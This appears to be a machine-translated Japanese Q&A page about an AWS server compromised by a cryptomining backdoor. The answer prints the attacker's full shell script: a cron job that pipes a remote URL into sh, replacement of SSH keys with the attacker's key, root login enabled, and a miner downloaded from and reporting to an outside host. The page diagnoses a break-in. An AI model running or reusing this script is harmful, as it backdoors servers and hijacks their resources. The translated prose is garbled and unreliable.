-1
私はawsを使用していますが、最後の数日間は不要なスクリプトが実行されています。以下はスクリーンショットです。AWS不要のスクリプト
私はそのプロセスをsudo kill -9 {pId}で強制終了しようとしましたが、実行できませんでした。
どれsuggesstion 
A
答えて
4
あなたのボックスが損なわました。
それはあなたのサーバにスクリプトをダウンロードし、あなたはそれがすべてのSSHキーを削除し、攻撃者がログインするための新しいものを作成し、見ることができるようにそれを
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh" > /var/spool/cron/root
echo "*/2 * * * * ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:[email protected]:6666/xmr &" >> /var/spool/cron/root
# echo "*/2 * * * * ps auxf | grep -v grep | grep gg2lady || nohup /opt/gg2lady &" >> /var/spool/cron/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/opt/yam/yam" ]; then
mkdir -p /opt/yam
curl -f -L https://r.chanstring.com/api/download/yam -o /opt/yam/yam
chmod +x /opt/yam/yam
# /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:[email protected]:6666/xmr
fi
# if [ ! -f "/opt/gg2lady" ]; then
# curl -f -L https://r.chanstring.com/api/download/gg2lady_`uname -i` -o /opt/gg2lady
# chmod +x /opt/gg2lady
# fi
pkill gg2lady
yam=$(ps auxf | grep yam | grep -v grep | wc -l)
gg2lady=$(ps auxf | grep gg2lady | grep -v grep | wc -l)
cpu=$(cat /proc/cpuinfo | grep processor | wc -l)
curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg2lady=$gg2lady\&arch=`uname -i`
を実行します。再び curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg2lady=$gg2lady\&arch=にそれが自身のステータスを報告するスクリプトの終わりに
のuname -i`
このサーバ彼らは私が
編集だと思う一度に全く妥協のサーバを見ることができるように: ドメインがあるがパナマに登録されています。おとぎ話。私はあなたのサーバーをチェックし、そのセキュリティに関するいくつかの助言を得るべきだと思います。
+0
あなたは正しいです。だから何をすべきか?彼らはどうしたのですか? –
+0
あなたのサーバーでこれを取得するために使用したものを言うことはできませんが、それはバックドアを持っているか、システム自体に脆弱性があるサービスです。 – KRONWALLED
+0
どうすればいいですか?何か案が ?またはどこからインストールしましたか? –
関連する問題
- 1. AWS S3 400不正な要求
- 2. AWSのcodedeploy投げるエラー行方不明スクリプト:停止
- 3. AWS ElasticSearchでの不正リクエスト
- 4. AWS .NET SDK不正なキー
- 5. 不要なページでスクリプトの実行を停止する
- 6. [::bashスクリプト上の不良数
- 7. AWS EC2インスタンス起動スクリプトでのAWSコマンドライン関数の使用
- 8. AWS Springブートアプリケーションの502不良リクエスト
- 9. Linuxスクリプトで不要なファイルが表示される
- 10. 写真をAWSのPythonスクリプトにアップロード
- 11. AWS Device Farm - スクリプト内の余分なデータパス
- 12. aws codedeploy - 実行中のSQLスクリプト
- 13. AWS Lambdaの公開後スクリプトですか?
- 14. Java AWSサーバー:502不正なゲートウェイnginx/1.8.1
- 15. aws cognito angular example:URIError:URIが不正形式
- 16. ツールバーが不適切な理由(AWS)
- 17. Javaスクリプトの配列の最後に不明な要素がありますか?
- 18. AWSサーバでスクリプトを実行する
- 19. AWS APIクレデンシャルを挿入するスクリプト
- 20. インストール不要のモジュールアクション
- 21. JSプラグインは、ページに不要なときに他のスクリプトを壊します
- 22. .html?option = "name"スクリプトの不具合
- 23. ANTスクリプト - 不一致グループのreplaceregexp
- 24. ペイパル・ペイメントクライアント側の不具合スクリプト
- 25. 不要なノード
- 26. 不要なスキップフレームエラー
- 27. ビジュアルスタジオコール不要メインメソッド
- 28. 不要なボーダー
- 29. 不要なジェネリックパラメータ
- 30. ボックスシャドー不要カーブ
SSHキーを使用していませんか? –